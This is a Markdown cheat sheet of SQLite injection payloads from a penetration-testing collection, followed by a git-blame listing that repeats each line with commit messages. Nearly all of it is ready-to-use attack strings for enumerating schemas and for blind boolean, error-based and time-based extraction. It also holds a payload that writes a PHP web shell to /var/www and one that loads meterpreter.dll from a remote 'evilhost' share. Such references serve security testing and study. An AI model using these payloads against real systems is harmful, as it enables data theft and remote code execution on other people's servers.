PayloadsAllTheThings/SQL Injection/SQLite Injection.md

# SQLite Injection

## Summary

* [SQLite comments](#sqlite-comments)
* [SQLite version](#sqlite-version)
* [String based - Extract database structure](#string-based---extract-database-structure)
* [Integer/String based - Extract table name](#integerstring-based---extract-table-name)
* [Integer/String based - Extract column name](#integerstring-based---extract-column-name)
* [Boolean - Count number of tables](#boolean---count-number-of-tables)
* [Boolean - Enumerating table name](#boolean---enumerating-table-name)
* [Boolean - Extract info](#boolean---extract-info)
* [Boolean - Error based](#boolean---error-based)
* [Time based](#time-based)
* [Remote Command Execution using SQLite command - Attach Database](#remote-command-execution-using-sqlite-command---attach-database)
* [Remote Command Execution using SQLite command - Load_extension](#remote-command-execution-using-sqlite-command---load_extension)
* [References](#references)
## SQLite comments

```sql
--
/**/
```

## SQLite version

```sql
select sqlite_version();
```

## String based - Extract database structure

```sql
SELECT sql FROM sqlite_schema
```

## Integer/String based - Extract table name

```sql
SELECT tbl_name FROM sqlite_master WHERE type='table' and tbl_name NOT like 'sqlite_%'
```

Use limit X+1 offset X, to extract all tables.

## Integer/String based - Extract column name

```sql
SELECT sql FROM sqlite_master WHERE type!='meta' AND sql NOT NULL AND name ='table_name'
```

For a clean output

```sql
SELECT replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(substr((substr(sql,instr(sql,'(')%2b1)),instr((substr(sql,instr(sql,'(')%2b1)),'')),"TEXT",''),"INTEGER",''),"AUTOINCREMENT",''),"PRIMARY KEY",''),"UNIQUE",''),"NUMERIC",''),"REAL",''),"BLOB",''),"NOT NULL",''),",",'~~') FROM sqlite_master WHERE type!='meta' AND sql NOT NULL AND name NOT LIKE 'sqlite_%' AND name ='table_name'
```

## Boolean - Count number of tables

```sql
and (SELECT count(tbl_name) FROM sqlite_master WHERE type='table' and tbl_name NOT like 'sqlite_%' ) < number_of_table
```

## Boolean - Enumerating table name

```sql
and (SELECT length(tbl_name) FROM sqlite_master WHERE type='table' and tbl_name not like 'sqlite_%' limit 1 offset 0)=table_name_length_number
```

## Boolean - Extract info

```sql
and (SELECT hex(substr(tbl_name,1,1)) FROM sqlite_master WHERE type='table' and tbl_name NOT like 'sqlite_%' limit 1 offset 0) > hex('some_char')
```

## Boolean - Extract info (order by)

```sql
CASE WHEN (SELECT hex(substr(sql,1,1)) FROM sqlite_master WHERE type='table' and tbl_name NOT like 'sqlite_%' limit 1 offset 0) = hex('some_char') THEN <order_element_1> ELSE <order_element_2> END
```

## Boolean - Error based

```sql
AND CASE WHEN [BOOLEAN_QUERY] THEN 1 ELSE load_extension(1) END
```

## Time based

```sql
AND [RANDNUM]=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))
```


## Remote Command Execution using SQLite command - Attach Database

```sql
ATTACH DATABASE '/var/www/lol.php' AS lol;
CREATE TABLE lol.pwn (dataz text);
INSERT INTO lol.pwn (dataz) VALUES ("<?php system($_GET['cmd']); ?>");--
```

## Remote Command Execution using SQLite command - Load_extension

```sql
UNION SELECT 1,load_extension('\\evilhost\evilshare\meterpreter.dll','DllMain');--
```

Note: By default this component is disabled

## References

[Injecting SQLite database based application - Manish Kishan Tanwar](https://www.exploit-db.com/docs/english/41397-injecting-sqlite-database-based-applications.pdf)
[SQLite Error Based Injection for Enumeration](https://rioasmara.com/2021/02/06/sqlite-error-based-injection-for-enumeration/)
SQLite injection update-Extract table/column name 2017-02-21 08:16:51 +00:00			`# SQLite Injection`
SQL injections payloads separated + OAuth 2016-11-29 16:27:35 +00:00
Added Summary in SQLite Injection 2019-10-29 13:52:49 +00:00			`## Summary`

			`* [SQLite comments](#sqlite-comments)`
			`* [SQLite version](#sqlite-version)`
SQLite Injection add extract database structure 2021-12-07 06:51:27 +00:00			`* [String based - Extract database structure](#string-based---extract-database-structure)`
Added Summary in SQLite Injection 2019-10-29 13:52:49 +00:00			`* [Integer/String based - Extract table name](#integerstring-based---extract-table-name)`
			`* [Integer/String based - Extract column name](#integerstring-based---extract-column-name)`
			`* [Boolean - Count number of tables](#boolean---count-number-of-tables)`
			`* [Boolean - Enumerating table name](#boolean---enumerating-table-name)`
			`* [Boolean - Extract info](#boolean---extract-info)`
Update SQLite Injection.md 2022-09-07 12:02:38 +00:00			`* [Boolean - Error based](#boolean---error-based)`
Added Summary in SQLite Injection 2019-10-29 13:52:49 +00:00			`* [Time based](#time-based)`
			`* [Remote Command Execution using SQLite command - Attach Database](#remote-command-execution-using-sqlite-command---attach-database)`
			`* [Remote Command Execution using SQLite command - Load_extension](#remote-command-execution-using-sqlite-command---load_extension)`
			`* [References](#references)`
Windows PrivEsc + SQLi second order + AD DiskShadow 2018-05-20 20:10:33 +00:00			`## SQLite comments`
Markdown formatting update 2018-08-12 21:30:22 +00:00
SQL Cheatsheets - Refactoring part 1 2018-05-16 21:33:14 +00:00			```sql
			`--`
			`/**/`
SQLmap tips + Active Directory attacks + SQLite injections 2018-03-12 08:17:31 +00:00			```
SQL Cheatsheets - Refactoring part 1 2018-05-16 21:33:14 +00:00
			`## SQLite version`
Markdown formatting update 2018-08-12 21:30:22 +00:00
SQL Cheatsheets - Refactoring part 1 2018-05-16 21:33:14 +00:00			```sql
SQLmap tips + Active Directory attacks + SQLite injections 2018-03-12 08:17:31 +00:00			`select sqlite_version();`
			```
SQLite injection update-Extract table/column name 2017-02-21 08:16:51 +00:00
SQLite Injection add extract database structure 2021-12-07 06:51:27 +00:00			`## String based - Extract database structure`

			```sql
			`SELECT sql FROM sqlite_schema`
			```

SQLite injection update-Extract table/column name 2017-02-21 08:16:51 +00:00			`## Integer/String based - Extract table name`
Markdown formatting update 2018-08-12 21:30:22 +00:00
SQL Cheatsheets - Refactoring part 1 2018-05-16 21:33:14 +00:00			```sql
SQLite injection update-Extract table/column name 2017-02-21 08:16:51 +00:00			`SELECT tbl_name FROM sqlite_master WHERE type='table' and tbl_name NOT like 'sqlite_%'`
			```
Markdown formatting update 2018-08-12 21:30:22 +00:00
SQLite injection update-Extract table/column name 2017-02-21 08:16:51 +00:00			`Use limit X+1 offset X, to extract all tables.`

			`## Integer/String based - Extract column name`
Markdown formatting update 2018-08-12 21:30:22 +00:00
SQL Cheatsheets - Refactoring part 1 2018-05-16 21:33:14 +00:00			```sql
Remove unnecessary condition to extract columns Since we retrieve only the rows with a specific table name `name ='table_name', the table name won't start with `sqlite_` . Thus, we can remove the unnecessary condition. 2020-11-18 00:59:11 +00:00			`SELECT sql FROM sqlite_master WHERE type!='meta' AND sql NOT NULL AND name ='table_name'`
SQLite injection update-Extract table/column name 2017-02-21 08:16:51 +00:00			```

			`For a clean output`
Markdown formatting update 2018-08-12 21:30:22 +00:00
SQL Cheatsheets - Refactoring part 1 2018-05-16 21:33:14 +00:00			```sql
SQLite injection update-Extract table/column name 2017-02-21 08:16:51 +00:00			`SELECT replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(substr((substr(sql,instr(sql,'(')%2b1)),instr((substr(sql,instr(sql,'(')%2b1)),'')),"TEXT",''),"INTEGER",''),"AUTOINCREMENT",''),"PRIMARY KEY",''),"UNIQUE",''),"NUMERIC",''),"REAL",''),"BLOB",''),"NOT NULL",''),",",'~~') FROM sqlite_master WHERE type!='meta' AND sql NOT NULL AND name NOT LIKE 'sqlite_%' AND name ='table_name'`
			```

			`## Boolean - Count number of tables`
Markdown formatting update 2018-08-12 21:30:22 +00:00
SQL Cheatsheets - Refactoring part 1 2018-05-16 21:33:14 +00:00			```sql
SQLite injection update-Extract table/column name 2017-02-21 08:16:51 +00:00			`and (SELECT count(tbl_name) FROM sqlite_master WHERE type='table' and tbl_name NOT like 'sqlite_%' ) < number_of_table`
			```

			`## Boolean - Enumerating table name`
Markdown formatting update 2018-08-12 21:30:22 +00:00
SQL Cheatsheets - Refactoring part 1 2018-05-16 21:33:14 +00:00			```sql
SQLite injection update-Extract table/column name 2017-02-21 08:16:51 +00:00			`and (SELECT length(tbl_name) FROM sqlite_master WHERE type='table' and tbl_name not like 'sqlite_%' limit 1 offset 0)=table_name_length_number`
			```

			`## Boolean - Extract info`
Markdown formatting update 2018-08-12 21:30:22 +00:00
SQL Cheatsheets - Refactoring part 1 2018-05-16 21:33:14 +00:00			```sql
SQLite injection update-Extract table/column name 2017-02-21 08:16:51 +00:00			`and (SELECT hex(substr(tbl_name,1,1)) FROM sqlite_master WHERE type='table' and tbl_name NOT like 'sqlite_%' limit 1 offset 0) > hex('some_char')`
			```

Boolean - Extract info (order by) 2022-08-13 04:22:54 +00:00			`## Boolean - Extract info (order by)`

			```sql
			`CASE WHEN (SELECT hex(substr(sql,1,1)) FROM sqlite_master WHERE type='table' and tbl_name NOT like 'sqlite_%' limit 1 offset 0) = hex('some_char') THEN <order_element_1> ELSE <order_element_2> END`
			```

Update SQLite Injection.md 2022-09-07 12:02:38 +00:00			`## Boolean - Error based`
Markdown formatting update 2018-08-12 21:30:22 +00:00
SQL Cheatsheets - Refactoring part 1 2018-05-16 21:33:14 +00:00			```sql
Update SQLite Injection.md 2022-09-07 12:02:38 +00:00			`AND CASE WHEN [BOOLEAN_QUERY] THEN 1 ELSE load_extension(1) END`
SQL injections payloads separated + OAuth 2016-11-29 16:27:35 +00:00			```
Boolean - Extract info (order by) 2022-08-13 04:22:54 +00:00
SQL Cheatsheets - Refactoring part 1 2018-05-16 21:33:14 +00:00			`## Time based`
Markdown formatting update 2018-08-12 21:30:22 +00:00
SQL Cheatsheets - Refactoring part 1 2018-05-16 21:33:14 +00:00			```sql
			`AND [RANDNUM]=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))`
SQL injections payloads separated + OAuth 2016-11-29 16:27:35 +00:00			```
SQL Cheatsheets - Refactoring part 1 2018-05-16 21:33:14 +00:00
Update SQLite Injection.md 2022-09-07 12:02:38 +00:00
SQL Cheatsheets - Refactoring part 1 2018-05-16 21:33:14 +00:00			`## Remote Command Execution using SQLite command - Attach Database`
Markdown formatting update 2018-08-12 21:30:22 +00:00
SQL Cheatsheets - Refactoring part 1 2018-05-16 21:33:14 +00:00			```sql
SQLmap tips + Active Directory attacks + SQLite injections 2018-03-12 08:17:31 +00:00			`ATTACH DATABASE '/var/www/lol.php' AS lol;`
SQL injections payloads separated + OAuth 2016-11-29 16:27:35 +00:00			`CREATE TABLE lol.pwn (dataz text);`
Single quotes are messing with the command. 2022-05-15 11:53:50 +00:00			`INSERT INTO lol.pwn (dataz) VALUES ("<?php system($_GET['cmd']); ?>");--`
SQL injections payloads separated + OAuth 2016-11-29 16:27:35 +00:00			```

SQLite injection update-Extract table/column name 2017-02-21 08:16:51 +00:00			`## Remote Command Execution using SQLite command - Load_extension`
Markdown formatting update 2018-08-12 21:30:22 +00:00
SQL Cheatsheets - Refactoring part 1 2018-05-16 21:33:14 +00:00			```sql
SQL injections payloads separated + OAuth 2016-11-29 16:27:35 +00:00			`UNION SELECT 1,load_extension('\\evilhost\evilshare\meterpreter.dll','DllMain');--`
			```
Markdown formatting update 2018-08-12 21:30:22 +00:00
SQLite injection update-Extract table/column name 2017-02-21 08:16:51 +00:00			`Note: By default this component is disabled`

Adding references sectio 2018-12-24 14:02:50 +00:00			`## References`
Markdown formatting update 2018-08-12 21:30:22 +00:00
Update SQLite Injection.md Added new link location for the pdf. 2020-04-03 23:15:05 +00:00			`[Injecting SQLite database based application - Manish Kishan Tanwar](https://www.exploit-db.com/docs/english/41397-injecting-sqlite-database-based-applications.pdf)`
Add error-based vector for the sqlite 2022-08-12 15:33:44 +00:00			`[SQLite Error Based Injection for Enumeration](https://rioasmara.com/2021/02/06/sqlite-error-based-injection-for-enumeration/)`